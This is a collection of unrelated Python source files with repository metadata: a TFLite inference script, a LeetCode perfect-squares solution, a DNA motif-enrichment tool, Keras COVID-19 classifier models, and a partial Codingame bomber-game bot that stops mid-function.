ee2bbf7c1e4317c398482eab21d1ee65220b378a | Python | msfurr/coral | /Coral_Test.py | UTF-8 | 1,342 | 2.9375 | 3 | [] | no_license | """
WORKING VERSION
Purpose:
Performs classification on existing raw data to better understand current
model
Outputs:
List of class results produced by TFLite model inference from sample data
"""
import numpy as np
from tflite_runtime.interpreter import Interpreter
import time
import pandas as pd
#%%
def main():
    """Run TFLite inference over every row of X_test.txt.

    Returns:
        list: argmax class index for each input row.
    """
    # Gather data from text file
    data = np.loadtxt('X_test.txt')
    # Add a leading batch axis and cast to float32 (TFLite input dtype).
    data = np.float32([data])
    # Setup interpreter for inference
    interpreter = Interpreter(model_path = "model_4.tflite")
    interpreter.allocate_tensors()
    input_details = interpreter.get_input_details()
    output_details = interpreter.get_output_details()
    start = time.time()
    results= []
    for i in range(0, len(data[0])):
        # data[0][[i]] keeps a leading axis: shape (1, n_features).
        input_data = data[0][[i]]
        print(input_data)
        interpreter.set_tensor(input_details[0]['index'], input_data)
        classStart = time.time()
        interpreter.invoke()
        results.append(np.argmax(interpreter.get_tensor(output_details[0]['index'])))
        classEnd = time.time()
    duration = time.time() - start
    # Average wall-clock time per sample (includes print overhead), then
    # the duration of the last invoke() alone.
    print(duration / len(data[0]))
    print(classEnd - classStart)
    return results
# Run inference and dump the per-sample class predictions to CSV.
results = main()
export_csv = pd.DataFrame(results).to_csv(r'/home/mendel/coral/coral_results.csv', header = True, index = None)
| true |
b638d4c1c5e9cda29ee4e93c2bdd02a869ebdcac | Python | KevinChen1994/leetcode-algorithm | /problem-list/DP/279.perfect-squares.py | UTF-8 | 1,188 | 3.8125 | 4 | [] | no_license | # !usr/bin/env python
# -*- coding:utf-8 _*-
# author:chenmeng
# datetime:2021/3/3 16:45
'''
solution: 最开始的思路是先将当前的数开平方,然后用当前的数减去最大的平方和,这样就可以通过dp去获取平方和的次数再加1就好了。
也就是dp[i] = dp[i-j**2] + 1,j是最大的平方和,j<i。但是这样就可能忽略一点,没有取最少的次数。例如:dp[12] =dp[3] + 1 = 4.
这样不是最少的,所以需要进行优化。
首先需要在最小的平方和之内一个一个去遍历,找到一直去计算dp[i] = min(dp[i], dp[j] + 1)。但是这样会超时。
所以需要提前计算好所有的平方和,存储起来,以减少运算。
'''
class Solution:
    def numSquares(self, n: int) -> int:
        """Return the least number of perfect squares that sum to n.

        Coin-change style DP: dp[total] is the minimum count of perfect
        squares adding up to ``total``; squares are precomputed once so
        the inner loop can stop early.
        """
        squares = []
        k = 1
        while k * k <= n:
            squares.append(k * k)
            k += 1
        dp = [0] + [float('inf')] * n
        for total in range(1, n + 1):
            for sq in squares:
                if sq > total:
                    break
                candidate = dp[total - sq] + 1
                if candidate < dp[total]:
                    dp[total] = candidate
        return dp[n]
# Quick manual check: 12 = 4 + 4 + 4, so the expected answer is 3.
if __name__ == '__main__':
    solution = Solution()
    n = 12
    print(solution.numSquares(n))
| true |
b5f8151cc92560890102bfb834208ac4ade5333d | Python | boberrey/sequence_analysis | /pattern_enrichment.py | UTF-8 | 7,321 | 2.75 | 3 | [] | no_license | #!/usr/bin/env python
"""
Calculate enrichment statistics for two sets of fasta files
Inputs:
two fasta files to compare
file containing patterns to check
Outputs:
pickled dictionary of pattern enrichments
Ben Ober-Reynolds
"""
import os
import sys
import re
import time
import argparse
import numpy as np
import pandas as pd
import pickle
from Bio import SeqIO
from joblib import Parallel, delayed
def main():
    """Parse CLI arguments, compute bootstrap motif densities for a
    target and a background fasta pool (optionally their reverse
    complements), and pickle the per-pattern results."""
    # set up command line argument parser
    parser = argparse.ArgumentParser(description='Calculate motif densities \
        for a target and a background set of fastas.')
    group = parser.add_argument_group('required arguments:')
    group.add_argument('-fi', '--fasta_of_interest', required=True,
        help='file containing clusters of interest')
    group.add_argument('-fb', '--background_fasta', required=True,
        help='file containing background clusters')
    group.add_argument('-pf', '--pattern_file', required=True,
        help='file containing patterns to check for. Format: \
        {pattern name}\\t{regex_pattern}')
    group = parser.add_argument_group('optional arguments')
    group.add_argument('-od', '--output_directory', default=".",
        help='output directory for statistics file and figures. \
        Default is current directory')
    group.add_argument('-op', '--output_prefix', default="enrichment",
        help='output prefix for results file and figures')
    group.add_argument('-isn', '--interesting_seq_name',
        default="Sequences of Interest",
        help='The name of the sequence of interest pool. Default is \
        "Sequences of Interest"')
    group.add_argument('-bsn', '--background_seq_name',
        default="Background Sequences", help='The name of the background \
        sequence pool. Default is "Background Sequences"')
    group.add_argument('-rc', '--reverse_comp', default="y",
        help='also calculate enrichment in reverse complement of each pool \
        [y/n]? Default is y.')
    group.add_argument('-nb', '--num_bootstraps', type=int, default=1000,
        help='number of times to resample pools for enrichment calculation. \
        Default is 1000.')
    group.add_argument('-n', '--num_cores', type=int, default=1,
        help='number of cores to use for bootstrapping.')

    # print help if no arguments provided
    if len(sys.argv) <= 1:
        parser.print_help()
        sys.exit()

    # parse command line arguments
    args = parser.parse_args()
    numCores = args.num_cores

    # Pre-defined variables, constants, and settings
    input_file_format = 'fasta'
    rev_c_tag = "Rev-Comp"
    output_prefix = time.strftime("%Y%m%d") + "_" + args.output_prefix
    pickle_file_ext = "p"

    # Do some error checking before running this long script:
    output_dir = args.output_directory
    if not os.path.isdir(output_dir):
        print("Error: invalid output directory. Exiting...")
        sys.exit()

    # Read in files:
    seqs_of_interest = read_fasta(args.fasta_of_interest, input_file_format)
    background_seqs = read_fasta(args.background_fasta, input_file_format)
    pattern_dict = read_pattern_file(args.pattern_file)

    # Find smallest pool size:
    # Both pools are resampled at the same size so densities are comparable.
    pool_size = min([len(seqs_of_interest), len(background_seqs)])

    # seq pool dict:
    seq_pool_dict = {args.interesting_seq_name: seqs_of_interest,
        args.background_seq_name: background_seqs}

    # Results dictionary:
    density_result_dict = {}
    for pname in pattern_dict.keys():
        density_result_dict[pname] = {}

    # compare to reverse complement?
    if args.reverse_comp == 'y':
        interesting_seq_rc_name = args.interesting_seq_name + " " + rev_c_tag
        background_seq_rc_name = args.background_seq_name + " " + rev_c_tag
        rc_seqs_of_interest = reverse_comp(seqs_of_interest)
        rc_background_seqs = reverse_comp(background_seqs)
        seq_pool_dict[interesting_seq_rc_name] = rc_seqs_of_interest
        seq_pool_dict[background_seq_rc_name] = rc_background_seqs

    # calculate motif density for each pattern
    # Parallel path (joblib) and serial path produce the same structure:
    # density_result_dict[pattern][pool] = list of bootstrap densities.
    if numCores > 1:
        with Parallel(n_jobs=numCores, verbose=10) as parallel:
            for pname in pattern_dict.keys():
                for pool_name in seq_pool_dict.keys():
                    densities = []
                    print("Calculating density of pattern '{}' in pool '{}'\
                        ".format(pname, pool_name))
                    densities = parallel(delayed(calc_resampled_motif_density)\
                        (seq_pool_dict[pool_name], pool_size, pattern_dict[pname])
                        for i in range(args.num_bootstraps))
                    density_result_dict[pname][pool_name] = densities
    else:
        for pname in pattern_dict.keys():
            for pool_name in seq_pool_dict.keys():
                densities = []
                print("Calculating density of pattern '{}' in pool '{}'\
                    ".format(pname, pool_name))
                densities = [calc_resampled_motif_density(
                    seq_pool_dict[pool_name], pool_size, pattern_dict[pname])
                    for i in range(args.num_bootstraps)]
                density_result_dict[pname][pool_name] = densities

    # Dump results to pickle for latter replotting
    with open(output_dir + '/' + output_prefix + '.' + pickle_file_ext, 'wb') as f:
        pickle.dump(density_result_dict, f)
def read_fasta(filename, input_file_format):
    """
    Read in a fasta file, and return its sequences (uppercased).
    Input: fasta filename and the Bio.SeqIO format string
    Output: numpy array of sequence strings
    """
    sequences = []
    with open(filename, 'r') as handle:
        for record in SeqIO.parse(handle, input_file_format):
            sequences.append(str(record.upper().seq))
    return np.array(sequences)
def read_pattern_file(filename):
    """
    Load a two-column, tab-delimited pattern file.

    Each line holds a pattern name and the regular expression defining
    that pattern; expressions are returned pre-compiled, keyed by name.
    """
    patterns = {}
    with open(filename, 'r') as handle:
        for line in handle:
            name, expression = line.strip().split('\t')
            patterns[name] = re.compile(expression)
    return patterns
def reverse_comp(fasta_array):
    """
    Reverse complement a list of sequences.
    Input: list of sequences (A/G/C/T alphabet)
    Output: numpy array with the reverse complement of each sequence
    """
    complement_table = str.maketrans('AGCT', 'TCGA')
    return np.array([seq.translate(complement_table)[::-1]
                     for seq in fasta_array])
def calc_resampled_motif_density(seq_array, samp_size, regex):
    """
    Length-normalized density of a regex pattern in a bootstrap resample.
    Inputs: list of sequences, number of seqs to draw (with replacement),
            compiled regular expression pattern
    Output: (total matches) / (total sequence length) over the resample
    """
    resample = np.random.choice(seq_array, size=samp_size, replace=True)
    hits = 0
    total_length = 0
    for sequence in resample:
        hits += len(regex.findall(sequence))
        total_length += len(sequence)
    return hits / total_length
# Script entry point.
if __name__ == '__main__':
    main()
| true |
9f2af1e4207ea618de1e7e42c6e3fa313343c725 | Python | cvlinks/UncertaintyFuseNet-for-COVID-19-Classification | /models.py | UTF-8 | 11,831 | 2.53125 | 3 | [] | no_license | import tensorflow as tf
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, Dense, Flatten, Dropout, BatchNormalization, Concatenate
from tensorflow.keras.layers import Conv2D, SeparableConv2D, MaxPool2D
from tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, EarlyStopping
def get_dropout(input_tensor, rate, mc=False):
    """Attach a Dropout layer to ``input_tensor``.

    When ``mc`` is True the dropout also runs at inference time
    (Monte-Carlo dropout); otherwise it is only active during training.
    """
    dropout_layer = Dropout(rate=rate)
    if mc:
        return dropout_layer(input_tensor, training=True)
    return dropout_layer(input_tensor)
# Our Proposed Fusion Model:
def fusion_model(mc, image_size=150, lr=0.00005):
    """Build and compile the proposed fusion CNN (3-class softmax output).

    Fuses flattened features from conv blocks 3-5 of a separable-conv
    stack with frozen ImageNet VGG16 features, then classifies through a
    dropout-heavy fully-connected head.

    Args:
        mc: when True, dropout stays active at inference time
            (Monte-Carlo dropout for uncertainty estimation).
        image_size: side length of the square single-channel input.
        lr: Adam learning rate.

    Returns:
        (model, callbacks): compiled Keras model and training callbacks.
    """
    inputs = Input(shape=(image_size, image_size, 1))
    # Replicate the grayscale channel three times so the image matches
    # VGG16's expected RGB input.
    input2 = tf.stack([inputs, inputs, inputs], axis=3)[:, :, :, :, 0]
    vgg_model = tf.keras.applications.VGG16(weights='imagenet',
                                            include_top=False,
                                            input_shape=(image_size, image_size, 3))
    vgg_model.trainable = False
    vgg_feature = vgg_model(input2)
    # First conv block
    conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
    conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
    conv1 = MaxPool2D(pool_size=(2, 2))(conv1)
    # Second conv block
    conv2 = SeparableConv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
    conv2 = SeparableConv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
    conv2 = BatchNormalization()(conv2)
    conv2 = MaxPool2D(pool_size=(2, 2))(conv2)
    # Third conv block
    conv3 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
    conv3 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
    conv3 = BatchNormalization()(conv3)
    conv3 = MaxPool2D(pool_size=(2, 2))(conv3)
    # Fourth conv block
    conv4 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
    conv4 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same', name='target_layer')(
        conv4)
    conv4 = BatchNormalization()(conv4)
    conv4 = MaxPool2D(pool_size=(2, 2))(conv4)
    conv4 = get_dropout(conv4, rate=0.2, mc=mc)
    # Fifth conv block
    conv5 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv4)
    conv5 = SeparableConv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv5)
    conv5 = BatchNormalization()(conv5)
    conv5 = MaxPool2D(pool_size=(2, 2))(conv5)
    conv5 = get_dropout(conv5, rate=0.2, mc=mc)
    # Feature fusion: custom conv features (blocks 3-5) + frozen VGG features.
    concatenated_tensor = Concatenate(axis=1)(
        [Flatten()(conv3), Flatten()(conv4), Flatten()(conv5), Flatten()(vgg_feature)])
    # FC layer
    x = Flatten()(concatenated_tensor)
    x = Dense(units=512, activation='relu')(x)
    x = get_dropout(x, rate=0.7, mc=mc)
    x = Dense(units=128, activation='relu')(x)
    x = get_dropout(x, rate=0.5, mc=mc)
    x = Dense(units=64, activation='relu')(x)
    x = get_dropout(x, rate=0.3, mc=mc)
    # Output layer
    output = Dense(3, activation='softmax')(x)
    METRICS = [
        tf.keras.metrics.Precision(name='precision'),
        tf.keras.metrics.Recall(name='recall'),
        tf.keras.metrics.AUC(name='auc')]
    # Creating model and compiling
    model = Model(inputs=inputs, outputs=output)
    # NOTE(review): Adam's 'lr' argument is deprecated in newer TF
    # ('learning_rate' is the current name) -- confirm the TF version.
    adam = tf.keras.optimizers.Adam(lr=lr)
    # NOTE(review): ['accuracy', METRICS] nests a list inside the metrics
    # list; tf.keras may interpret nested lists as per-output metrics --
    # confirm that ['accuracy'] + METRICS was not intended.
    model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy', METRICS])
    # Callbacks
    if mc:
        mcheck = ModelCheckpoint('model_covid_mc.h5', monitor='val_accuracy', mode='max', verbose=1,
                                 save_best_only=True)
    else:
        mcheck = ModelCheckpoint('model_covid_simple.h5', monitor='val_accuracy', mode='max', verbose=1,
                                 save_best_only=True)
    reduce_lr = ReduceLROnPlateau(monitor='val_accuracy', factor=0.8, verbose=1, patience=5)
    es = EarlyStopping(monitor='val_accuracy', mode='max', verbose=0, patience=30)
    callbacks = [reduce_lr, es, mcheck]
    return model, callbacks
# Simple CNN Model:
def simple_cnn_model(mc, image_size=150, lr=0.00005):
    """Build and compile the baseline CNN (3-class softmax output).

    Args:
        mc: when True, dropout stays active at inference time
            (Monte-Carlo dropout).
        image_size: side length of the square single-channel input.
        lr: Adam learning rate.

    Returns:
        (model, callbacks): compiled Keras model and training callbacks.
    """
    inputs = Input(shape=(image_size, image_size, 1))
    conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
    conv2 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
    conv2 = MaxPool2D(pool_size=(2, 2))(conv2)
    conv3 = Conv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
    conv4 = Conv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
    conv4 = BatchNormalization()(conv4)
    conv4 = MaxPool2D(pool_size=(2, 2))(conv4)
    conv5 = Conv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv4)
    conv5 = BatchNormalization()(conv5)
    conv5 = get_dropout(conv5, rate=0.2, mc=mc)
    # FC layer
    x = Flatten()(conv5)
    x = Dense(units=128, activation='relu')(x)
    x = get_dropout(x, rate=0.7, mc=mc)
    x = Dense(units=64, activation='relu')(x)
    x = get_dropout(x, rate=0.5, mc=mc)
    # Output layer
    output = Dense(3, activation='softmax')(x)
    METRICS = [
        tf.keras.metrics.Precision(name='precision'),
        tf.keras.metrics.Recall(name='recall'),
        tf.keras.metrics.AUC(name='auc')]
    # Creating model and compiling
    model = Model(inputs=inputs, outputs=output)
    # NOTE(review): 'lr' is deprecated in newer TF; nested metrics list as
    # in fusion_model -- confirm intent.
    adam = tf.keras.optimizers.Adam(lr=lr)
    model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy', METRICS])
    # Callbacks
    if mc:
        mcheck = ModelCheckpoint('simple_cnn_model_covid_mc.h5', monitor='val_accuracy', mode='max', verbose=1,
                                 save_best_only=True)
    else:
        mcheck = ModelCheckpoint('simple_cnn_model_covid_simple.h5', monitor='val_accuracy', mode='max', verbose=1,
                                 save_best_only=True)
    reduce_lr = ReduceLROnPlateau(monitor='val_accuracy', factor=0.8, verbose=1, patience=5)
    es = EarlyStopping(monitor='val_accuracy', mode='max', verbose=0, patience=30)
    callbacks = [reduce_lr, es, mcheck]
    return model, callbacks
# Multi-headed Model:
def multi_headed_model(mc, image_size=150, lr=0.00001):
    """Build and compile the multi-headed CNN (3-class softmax output).

    Three identical conv heads read the same input; their flattened
    outputs are concatenated before the fully-connected classifier.

    Args:
        mc: when True, dropout stays active at inference time
            (Monte-Carlo dropout).
        image_size: side length of the square single-channel input.
        lr: Adam learning rate.

    Returns:
        (model, callbacks): compiled Keras model and training callbacks.
    """
    inputs = Input(shape=(image_size, image_size, 1))
    conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
    conv1 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
    conv1 = BatchNormalization()(conv1)
    conv1 = MaxPool2D(pool_size=(2, 2))(conv1)
    conv1 = get_dropout(conv1, rate=0.2, mc=mc)
    conv2 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
    conv2 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
    conv2 = BatchNormalization()(conv2)
    conv2 = MaxPool2D(pool_size=(2, 2))(conv2)
    conv2 = get_dropout(conv2, rate=0.2, mc=mc)
    conv3 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
    conv3 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
    conv3 = BatchNormalization()(conv3)
    conv3 = MaxPool2D(pool_size=(2, 2))(conv3)
    conv3 = get_dropout(conv3, rate=0.2, mc=mc)
    concatenated_tensor = Concatenate(axis=1)([Flatten()(conv1), Flatten()(conv2), Flatten()(conv3)])
    # FC layer
    x = Flatten()(concatenated_tensor)
    x = Dense(units=128, activation='relu')(x)
    x = get_dropout(x, rate=0.7, mc=mc)
    x = Dense(units=64, activation='relu')(x)
    x = get_dropout(x, rate=0.5, mc=mc)
    # Output layer
    output = Dense(3, activation='softmax')(x)
    METRICS = [
        tf.keras.metrics.Precision(name='precision'),
        tf.keras.metrics.Recall(name='recall'),
        tf.keras.metrics.AUC(name='auc')]
    # Creating model and compiling
    model = Model(inputs=inputs, outputs=output)
    # NOTE(review): 'lr' is deprecated in newer TF; nested metrics list as
    # in fusion_model -- confirm intent.
    adam = tf.keras.optimizers.Adam(lr=lr)
    model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy', METRICS])
    # Callbacks
    if mc:
        mcheck = ModelCheckpoint('multi_headed_model_covid_mc.h5', monitor='val_accuracy', mode='max', verbose=1,
                                 save_best_only=True)
    else:
        mcheck = ModelCheckpoint('multi_headed_model_covid_simple.h5', monitor='val_accuracy', mode='max', verbose=1,
                                 save_best_only=True)
    reduce_lr = ReduceLROnPlateau(monitor='val_accuracy', factor=0.8, verbose=1, patience=5)
    es = EarlyStopping(monitor='val_accuracy', mode='max', verbose=0, patience=30)
    callbacks = [reduce_lr, es, mcheck]
    return model, callbacks
# Truncated Models Used in t-SNE:
def simple_cnn_trunc_model(trained_model, mc, image_size=150, lr=0.00005):
    """Rebuild simple_cnn_model truncated at the first Dense(128) layer.

    Mirrors the trained model's architecture layer-for-layer up to the
    128-unit feature layer and copies its weights by index, so the result
    emits the learned feature embedding (used for t-SNE).

    Args:
        trained_model: a model produced by simple_cnn_model with weights.
        mc: must match the flag used for the trained model so the layer
            indices line up.
        image_size: side length of the square single-channel input.
        lr: Adam learning rate (only used to compile; no training occurs).

    Returns:
        The compiled truncated model.
    """
    inputs = Input(shape=(image_size, image_size, 1))
    conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
    conv2 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
    conv2 = MaxPool2D(pool_size=(2, 2))(conv2)
    conv3 = Conv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
    conv4 = Conv2D(filters=32, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
    conv4 = BatchNormalization()(conv4)
    conv4 = MaxPool2D(pool_size=(2, 2))(conv4)
    conv5 = Conv2D(filters=64, kernel_size=(3, 3), activation='relu', padding='same')(conv4)
    conv5 = BatchNormalization()(conv5)
    conv5 = get_dropout(conv5, rate=0.2, mc=mc)
    # Output layer
    x = Flatten()(conv5)
    x = Dense(units=128, activation='relu')(x)
    output = x
    # Creating model and compiling
    model = Model(inputs=inputs, outputs=output)
    adam = tf.keras.optimizers.Adam(lr=lr)
    model.compile(optimizer=adam, loss='categorical_crossentropy')
    # Copy weights from the trained model, layer by layer (same order).
    for i, layer in enumerate(model.layers):
        layer.set_weights(trained_model.layers[i].get_weights())
    # NOTE(review): this second compile looks redundant -- confirm.
    model.compile(optimizer=adam, loss='categorical_crossentropy')
    return model
def multi_headed_trunc_model(trained_model, mc, image_size=150, lr=0.00001):
    """Rebuild multi_headed_model truncated at the first Dense(128) layer.

    Mirrors the trained model's three-headed architecture and copies its
    weights by index, so the result emits the learned feature embedding
    (used for t-SNE).

    Args:
        trained_model: a model produced by multi_headed_model with weights.
        mc: must match the flag used for the trained model so the layer
            indices line up.
        image_size: side length of the square single-channel input.
        lr: Adam learning rate (only used to compile; no training occurs).

    Returns:
        The compiled truncated model.
    """
    inputs = Input(shape=(image_size, image_size, 1))
    conv1 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
    conv1 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv1)
    conv1 = BatchNormalization()(conv1)
    conv1 = MaxPool2D(pool_size=(2, 2))(conv1)
    conv1 = get_dropout(conv1, rate=0.2, mc=mc)
    conv2 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
    conv2 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv2)
    conv2 = BatchNormalization()(conv2)
    conv2 = MaxPool2D(pool_size=(2, 2))(conv2)
    conv2 = get_dropout(conv2, rate=0.2, mc=mc)
    conv3 = Conv2D(filters=16, kernel_size=(3, 3), activation='relu', padding='same')(inputs)
    conv3 = Conv2D(filters=8, kernel_size=(3, 3), activation='relu', padding='same')(conv3)
    conv3 = BatchNormalization()(conv3)
    conv3 = MaxPool2D(pool_size=(2, 2))(conv3)
    conv3 = get_dropout(conv3, rate=0.2, mc=mc)
    concatenated_tensor = Concatenate(axis=1)([Flatten()(conv1), Flatten()(conv2), Flatten()(conv3)])
    # Output layer
    x = Flatten()(concatenated_tensor)
    x = Dense(units=128, activation='relu')(x)
    output = x
    # Creating model and compiling
    model = Model(inputs=inputs, outputs=output)
    adam = tf.keras.optimizers.Adam(lr=lr)
    model.compile(optimizer=adam, loss='categorical_crossentropy')
    # Copy weights from the trained model, layer by layer (same order).
    for i, layer in enumerate(model.layers):
        layer.set_weights(trained_model.layers[i].get_weights())
    # NOTE(review): this second compile looks redundant -- confirm.
    model.compile(optimizer=adam, loss='categorical_crossentropy')
    return model
| true |
4f462c4e21d1be5a397c854eb0091190ce4a94e6 | Python | SamAstro/codingame | /contests/hypersonic/ligue_bois_1.py | UTF-8 | 14,330 | 2.9375 | 3 | [] | no_license | #!/opt/local/bin/python
"""
BOT FOR THE 'LIGUE BOIS 1' OF THE 'HYPERSONIC' CONTEST
Version: 1.1
Created: 09/25/2016
Compiler: python3.5
Author: Dr. Samia Drappeau (SD), drappeau.samia@gmail.com
Notes:
"""
import sys
import math
import numpy as np
import random
# Flags
# Module-level game-state flags; presumably reset/updated each turn by the
# game loop further down the file -- confirm before relying on them here.
isHeroInDanger = False  # True when a bomb can currently reach the hero
isUpClose = False       # True when a power-up item is nearby
isFirstTurn = True
isFirstBomb = True
# Reproducing randomness -- FOR DEBUG ONLY
random.seed(9001)
##### FUNCTIONS #####
def distance(hero, cx, cy):
    """Per-axis distances between *hero* and the cell (cx, cy).

    Args:
        hero: any object with integer ``x``/``y`` attributes.
        cx, cy: target cell coordinates.

    Returns:
        (distx, disty): non-negative horizontal and vertical distances,
        as floats (matching the original math.sqrt-based return type).
    """
    # math.sqrt(a**2) is just abs(a); spell it directly.
    return float(abs(cx - hero.x)), float(abs(cy - hero.y))
def find_crate(crates, crates_bombs, random=True):
    """Pick a crate to bomb next.

    Args:
        crates: dict of crate entities (each with ``.x``/``.y``).
        crates_bombs: dict whose values are (x, y) pairs of crates that
            already have a bomb planted next to them.
        random: if True pick a random un-bombed crate; otherwise pick the
            crate closest to the module-level ``hero``.

    Returns:
        (posx, posy): target cell; (0, 0) in the non-random path when no
        un-bombed crate is nearer than 30 cells (original behaviour).
    """
    # BUG FIX: the boolean parameter ``random`` shadowed the ``random``
    # module, so the random.randint/random.choice calls below crashed
    # with AttributeError.  Bind the module under a private alias.
    import random as _rng

    if len(crates) == 0:
        # No crates left: wander to an arbitrary on-board cell.
        # BUG FIX: the board is 13x11, so valid indices are 0..12 / 0..10
        # (the old randint(0, 13)/(0, 11) could leave the board).
        return _rng.randint(0, 12), _rng.randint(0, 10)

    if len(crates) == 1:
        # Single crate: take it whatever its dict key is (the old code
        # assumed the key 0 existed).
        only = next(iter(crates.values()))
        return only.x, only.y

    bombed = {(cb[0], cb[1]) for cb in crates_bombs.values()}
    free = [c for c in crates.values() if (c.x, c.y) not in bombed]

    if random:
        if not free:
            # Every crate already has a bomb: the old code would spin
            # forever here -- fall back to any crate instead.
            free = list(crates.values())
        target = _rng.choice(free)
        return target.x, target.y

    # Closest un-bombed crate to the hero.
    # NOTE(review): relies on a module-level ``hero`` global, as the
    # original did -- confirm the game loop defines it before this call.
    best_x = best_y = 0
    best_dist = 30
    for crate in free:
        dx, dy = distance(hero, crate.x, crate.y)
        if dx + dy < best_dist:
            best_x, best_y = crate.x, crate.y
            best_dist = dx + dy
    return best_x, best_y
def find_ups_onboard(hero, obj_ups):
    """Locate the power-up item closest to *hero*.

    Returns:
        (isUpClose, posx, posy): the flag is True when an item lies
        within a straight-line distance of 10 cells; posx/posy is the
        closest item's cell (0, 0 when none qualifies).
    """
    best_dist = 10
    best_x = best_y = 0
    found = False
    for ups in obj_ups.values():
        dx = hero.x - ups.x
        dy = hero.y - ups.y
        straight_line = math.sqrt(dx * dx + dy * dy)
        if straight_line < best_dist:
            best_x, best_y = ups.x, ups.y
            best_dist = straight_line
            found = True
    return found, best_x, best_y
def find_bot_onboard(hero, bots):
    """Check whether an enemy bot is axis-aligned with the hero within
    its bomb reach.

    Returns:
        (isBotNear, posx, posy): position of the last aligned bot found
        (0, 0 when there is none).
    """
    found = False
    best_x = best_y = 0
    for bot in bots.values():
        dx, dy = hero.x - bot.x, hero.y - bot.y
        same_row = dy == 0 and math.fabs(dx) < hero.bomb_reach
        same_col = dx == 0 and math.fabs(dy) < hero.bomb_reach
        if same_row or same_col:
            found = True
            best_x, best_y = bot.x, bot.y
    return found, best_x, best_y
def find_bombs_onboard(hero, bombs):
    """Scan all bombs and report whether one threatens the hero.

    Returns:
        (isHeroInDanger, posx, posy, bomb_range): position of the last
        threatening bomb (0, 0 when none), plus the blast range of the
        last bomb scanned (None when there are no bombs).
    """
    in_danger = False
    posx = posy = 0
    last_range = None
    for bomb in bombs.values():
        last_range = bomb.param_2 - 1
        ticks_left = bomb.param_1
        dx = hero.x - bomb.x
        dy = hero.y - bomb.y
        # Threatened when sharing a row/column with the bomb, or sitting
        # one cell off on either axis (note: +1 only, not -1).
        if dx == 0 or dy == 0 or dx == 1 or dy == 1:
            in_danger = True
            posx, posy = bomb.x, bomb.y
    return in_danger, posx, posy, last_range
##### CLASSES #####
# Creating Class entity
class Entity():
    """Generic board entity (player, bomb, or power-up).

    Coordinates are coerced to int; the meaning of param_1/param_2 depends
    on the entity type (e.g. bomb timer and blast range for bombs).
    """
    def __init__(self, entity_type=0, owner=0, x=0, y=0, param_1=0, param_2=0):
        self.entity_type, self.owner = entity_type, owner
        self.x, self.y = int(x), int(y)
        self.param_1, self.param_2 = param_1, param_2
class Hero(Entity):
    """The player-controlled bomber; extends Entity with turn bookkeeping."""
    # Previous-turn position (class-level defaults, shadowed per instance).
    past_x = 0
    past_y = 0
    bomb_reach = 2
    bomb_previous_turn = False
    def __init__(self, entity_type=0, owner=0, x=0, y=0, param_1=0, param_2=0):
        # BUG FIX: the original forwarded hard-coded zeros to
        # Entity.__init__, silently discarding every constructor argument.
        super().__init__(entity_type, owner, x, y, param_1, param_2)
    # Methods related to crates
    def move_to_crate(self, posx, posy):
        """Emit a MOVE command towards (posx, posy) on stdout."""
        print("MOVE", posx, posy, sep=" ")
    def bomb_crate(self, posx, posy):
        """Emit a BOMB command at (posx, posy) on stdout."""
        print("BOMB", posx, posy, sep=" ")
    def next_to_a_crate(self, crates, crates_bombs):
        """Return (found, x, y) for an adjacent crate that has no bomb yet.

        Side effect: sets ``self.bomb_previous_turn`` when a crate is found.
        BUG FIX: the original read the module-level global ``hero`` instead
        of ``self``, breaking any instance other than the global one.
        """
        isHeroNextCrate = False
        posx_crate, posy_crate = None, None
        for k, crate in crates.items():
            # Is there a crate next to HERO (4-neighbourhood)?
            if (math.fabs(self.x - crate.x) == 1 and self.y == crate.y) or (math.fabs(self.y - crate.y) == 1 and self.x == crate.x):
                print("HERO next to crate... can we bomb?", file=sys.stderr)
                # Is there already a bomb with the crate?
                isCrateBomb = False
                for kk, crate_bomb in crates_bombs.items():
                    if crate.x == crate_bomb[0] and crate.y == crate_bomb[1]:
                        isCrateBomb = True
                        break
                if isCrateBomb:
                    continue
                else:
                    isHeroNextCrate = True
                    posx_crate, posy_crate = crate.x, crate.y
                    self.bomb_previous_turn = True
                    break
        return isHeroNextCrate, posx_crate, posy_crate
    # Methods related to Bombs
    def bomb_under(self, bombs):
        """True if a bomb occupies this hero's current cell."""
        isBombUnderHero = False
